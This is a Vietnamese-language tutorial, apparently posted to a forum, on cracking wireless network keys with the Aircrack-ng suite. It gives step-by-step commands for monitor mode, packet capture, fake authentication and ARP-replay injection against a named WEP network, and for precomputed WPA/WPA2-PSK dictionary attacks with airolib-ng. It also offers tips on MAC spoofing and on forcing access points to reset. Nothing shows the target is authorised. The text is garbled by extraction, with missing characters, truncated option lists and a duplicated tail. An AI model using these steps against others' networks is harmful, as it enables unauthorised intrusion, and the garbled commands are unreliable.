Http://forum.mait.vn nhanth87@gmailcom Trần Hữu Nhân – ĐHSP Hướng dẫn sử dụng Aircrack-ng Giới thiệu Aircrack-ng: Aircrack-ng công cụ dùng để pentest mạng khơng dây, crack wep dị khóa wpa/wpa2psk Aircrack-ng có nhiều cơng cụ, tài liệu giới thiệu vài cơng cụ là: airemon-ng: dùng để chuyển card mạng bạn từ manager sang monitor Cách dùng: airmon-ng [channel] airodump-ng: dùng để bắt gói tin mạng wifi (lưu ý card mạng bạn phải chế độ monitor) Cách dùng: airodump-ng [,, ] aireplay-ng: dùng để tạo gói tin inject gửi tới AP nhằm nhận gói ARP phản hồi Cách dùng: aireplay-ng packetforge-ng: gửi gói tin giả tới AP để nhận phản hồi Cách dùng: packetforge-ng airolib-ng: công cụ hay giúp tạo sở liệu khóa tính tốn trước, làm đơn giản hóa q trình crack key ta Ưu, nhược điểm nói sau Aircrack-ng: sáng :), crack wep hay dị khóa dùng Cách dùng: aircrack-ng [options] Và nhiều công cụ khác Về option tools, bạn gõ man tên tool để biết chi tiết Http://forum.mait.vn nhanth87@gmailcom Trần Hữu Nhân – ĐHSP Crack WEP key: • Trước hết ta nói kỹ thuật crack WEP Mở terminal lên gõ aireplay-ng khơng có thơng số: Ta thấy aireplay giới thiệu kỹ thuật: • fakeauth: dù crack wep kiểu trước tiên bạn phải fake authentication :) • arpreplay: kiểu cơng nhất, cố gắng bắt đủ số lượng gói tin arp cần thiết cho việc crack • Chopchop: tạo gói tin inject đẩy tới Ap để nhận arp phản hồi Đối với AP đời mới, kiểu chopchop dường khơng có hiệu lực • Fragment: kiểu cơng giống chopchop tạo gói tin phân mảnh làm AP không mà lần :) Kiểu tất nhiên dễ thành công hơn, đòi hỏi kỹ bạn phải cao (nhưng Nhân nghe nói có airoscript tự động hóa cơng đoạn, bạn việc đưa vào mac AP, chọn kiểu công ngồi chờ :D) • caffe-latte: kỹ thuật dựa vào lỗi windows, có query quăng gói arp mã hóa, ít, đủ Kỹ thuật cần 1,5 đến tháng để thành cơng • Test: để kiểm tra xem card mạng bạn có khả inject hay khơng ? Http://forum.mait.vn nhanth87@gmailcom Trần Hữu Nhân – ĐHSP Demo crack WEP kỹ thuật arprequest: • Đầu tiên ta chuyển card mạng chế độ monitor: #airmon-ng start wlan0 câu lệnh tạo interface ảo có tên mon0 (tùy vào hệ thống bạn) – bạn thử tìm cách tạo mon1 channel 11, mon2 lắng nge channel 13 thử xem ? • Tiếp theo, bật airodump-ng để xem xét tình hình mạng wifi xung quanh (nếu chưa bật mon0 dùng #iwlist wlan0 scan ): #airodump-ng mon0 Http://forum.mait.vn nhanth87@gmailcom Trần Hữu Nhân – ĐHSP Các bạn thấy đống hầm bà lằng đủ thứ này, thật đáng sợ :), lúc đầu Nhân nhìn vào chảng biết cả, thật khơng q khó, đám khơng phải ngơn ngữ bọn ngồi hành tinh Ở Nhân giải thích số thơng số: • BSSID: địa Mac AP, có AP liệt kê hết Trong ví dụ đố bạn có AP ? • PWR: tất nhiên power :) độ mạnh yếu mạng, power = -1 ta dễ dàng đoán mạng adhoc • Beacons: mốc kết nối • #Data: số data luân chuyển mạng • #/s rõ ràng số lượng packet chuyển mạng s • CH channel, thơng số quan trọng việc crack khóa • Nhìn thơng số MB ta dễ dàng đoán chuẩn AP: 11 MB chuẩn b, 54 MB chuẩn g, chuẩn n ?? • ENC, CIPHER, AUTH – kiểu khóa, thuật tốn, tình trạng kết nối Hy vọng sau authentication bạn có OPN trường AUTH • ESSID tên mạng Bây xem vd khác: #airodump-ng mon0: • Chúng ta chọn mục tiêu mạng meodien (tiêu rồi) Chúng ta hướng card mạng vào mục tiêu mèo điên #airodump-ng mon0 bssid Mac_meodien essid meodien channel 11 -w meodien.cap Http://forum.mait.vn • Mở thêm terminal nữa, bắt đầu fake authentication nó: #aireplay-ng -1 45 -a Mac_meodien -h mymac mon0 • Xong phần chính, ta áp dụng kỹ thuật arprequest: #aireplay-ng -3 -b Mac_meodien -h mymac mon0 • • Chờ bắt khoảng 70.000 packet arp tiến hành crack Đơn giản, chạy #aircrack-ng -a meodien.cap thưởng thức :) nhanth87@gmailcom Trần Hữu Nhân – ĐHSP Http://forum.mait.vn nhanth87@gmailcom Trần Hữu Nhân – ĐHSP Tạo sở liệu dùng airolib-ng: Việc dị khóa gây nhiều thời gian, lỡ may bị cúp điện phải làm lại Hãy thử tưởng tượng việc ta dành tháng để quét, bị cúp điện :D Do tạo sở liệu để quét mà khơng lo cúp diện Ưu điểm tiếp tục tạo key sau khởi động lại (mà khơng phải dị lại từ đầu) Có thể thêm từ điển vào Nhược điểm tốn ổ cứng • Để dùng airolib-ng phải có sqlite3 trước đã: #sudo aptitude install sqlite3 (cho ubuntu) #yum -i sqlite3 (cho fedora/redhat) Các phiên khác bạn đọc tài liệu khác để biết cách cài • Sau cịn phải kiểm tra xem aircrack có hỗ trợ qt csdl hay khơng? #man aircrack-ng Nếu bạn thấy thơng số -r aircrack sẵn sàng để qt csdl Nếu khơng phải build từ source Bạn xem www.aircrack-ng.org để biết thêm chi tiết • Bây tạo csdl: file từ điển webster, file essid essid.txt, testcrk file csdl ta tạo #airolib-ng testcrk import essid essid.txt #airolib-ng testcrk import passwd webster #airolib-ng testcrk –batch • Dùng csdl để quét: #aircrack-ng -r testcrk wpademo.cap Hãy làm thử so sánh tốc độ quét, bạn phải ngạc nhiên :) Http://forum.mait.vn nhanth87@gmailcom Trần Hữu Nhân – ĐHSP Một số điều cần biết: Đây kiến thức mà Nhân thu thập trình pentest mạng khơng dây Nếu bạn gặp trục trặc hy vọng phần giúp bạn nhiều: Card mạng bạn khơng chuyển chế độ monitor – xem danh sách card hỗ trợ www.aircrack-ng.org Chỉ dị khóa WPA/WPA2-PSK, kiểu auth khác vd Change mac address gặp lỗi khơng authentication Sự im lặng router: mạng AP khơng có máy kết nối bạn nhanh chóng nhận khơng bắt gói tin ARP hết Lý AP đời sau harderning, tụi yên lặng, khó mà cạy gói tin ARP Giải pháp thử crack vào thời gian khác :) dùng mdk3 để cố gắng reset AP, AP khởi động lại, quăng gói tin ARP, dùng koreK fragment để crack thơi >:) Từ điển để dị wpa/wpa2 tìm thấy : http://www.theargon.com/ http://forums.remote-exploit.org/ mục pentesting Bài viết dựa tài liệu: Toàn tài liệu www.aircrack-ng.org Các tài liệu file film Xploitz http://forums.remote-exploit.org/ Đây phiên tài liệu này, có sai sót, tìm thấy lỗi bạn report cho Nhân nhanth87 at gmail dot com  ... phải kiểm tra xem aircrack có hỗ trợ quét csdl hay không? #man aircrack- ng Nếu bạn thấy thơng số -r aircrack sẵn sàng để qt csdl Nếu khơng phải build từ source Bạn xem www .aircrack- ng.org để... Mac_meodien -h mymac mon0 • • Chờ bắt khoảng 70.000 packet arp tiến hành crack Đơn giản, chạy #aircrack- ng -a meodien.cap thưởng thức :) nhanth87@gmailcom Trần Hữu Nhân – ĐHSP Http://forum.mait.vn... essid.txt #airolib-ng testcrk import passwd webster #airolib-ng testcrk –batch • Dùng csdl để quét: #aircrack- ng -r testcrk wpademo.cap Hãy làm thử so sánh tốc độ quét, bạn phải ngạc nhiên :) Http://forum.mait.vn